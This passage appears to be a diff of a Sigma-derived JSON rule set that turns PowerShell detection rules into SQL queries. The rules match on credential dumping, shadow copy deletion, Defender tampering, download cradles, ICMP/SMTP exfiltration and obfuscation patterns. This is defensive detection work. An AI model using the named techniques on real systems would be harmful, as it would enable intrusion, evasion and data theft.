'%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_audio_exfiltration.yml" + "filename": "posh_ps_import_module_susp_dirs.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", + "status": "test", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Windows PowerShell Upload Web Request", + "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "author": "frack113", + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "falsepositives": [ + "Legitimate script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + ], + "filename": "posh_ps_upload.yml" + }, + { + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "status": "test", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.t1047", "attack.t1059.001" ], + "falsepositives": [ + "Administrative scripts that use the same keywords." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + ], + "filename": "posh_ps_wmimplant.yml" + }, + { + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "status": "test", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", - "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", - "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "title": "Dump Credentials from Windows Credential Manager With PowerShell", + "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1555" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" ], - "filename": "posh_ps_frombase64string_archive.yml" + "filename": "posh_ps_dump_password_windows_credential_manager.yml" }, { - "title": "Suspicious Get-ADReplAccount", - "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "title": "Suspicious Mount-DiskImage", + "id": "29e1c216-6408-489d-8a06-ee9d151ef819", "status": "test", - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\')" ], - "filename": "posh_ps_get_adreplaccount.yml" + "filename": "posh_ps_susp_mount_diskimage.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", - "id": "db885529-903f-4c5d-9864-28fe199e6370", - "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell ICMP Exfiltration", + "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "status": "test", + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Legitimate usage of System.Net.NetworkInformation.Ping class" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml" + "filename": "posh_ps_icmp_exfiltration.yml" }, { - "title": "Powershell Exfiltration Over SMTP", - "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_send_mailmessage.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious PowerShell Download - Powershell Script", - "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "title": "Suspicious Get-WmiObject", + "id": "0332a266-b584-47b4-933d-a00b103e1b37", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND NOT ((Path LIKE '%\\\\CL\\_Utility.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%function Get-FreeSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%SELECT % FROM Win32\\_LogicalDisk WHERE MediaType=12%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_download.yml" + "filename": "posh_ps_susp_gwmi.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", - "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "status": "experimental", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "posh_ps_susp_zip_compress.yml" }, { "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", @@ -7998,6674 +7627,6720 @@ "filename": "posh_ps_install_unsigned_appx_packages.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", + "id": "1139d2e2-84b1-4226-b445-354492eba8ba", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "title": "Suspicious GPO Discovery With Get-GPO", + "id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-GPO%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + "filename": "posh_ps_susp_get_gpo.yml" }, { - "title": "Suspicious Unblock-File", - "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "title": "Powershell Timestomp", + "id": "c6438007-e081-42ce-9483-b067fbef33c3", "status": "test", - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1553.005" + "attack.t1070.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_unblock_file.yml" + "filename": "posh_ps_timestomp.yml" }, { - "title": "Potential PowerShell Obfuscation Using Character Join", - "id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", + "title": "Windows Screen Capture with CopyFromScreen", + "id": "d4a11f63-2390-411c-9adf-d791fd152830", "status": "experimental", - "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1027", - "attack.t1059.001" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Alias%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Value (-join(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_alias_obfscuation.yml" + "filename": "posh_ps_capture_screenshots.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE 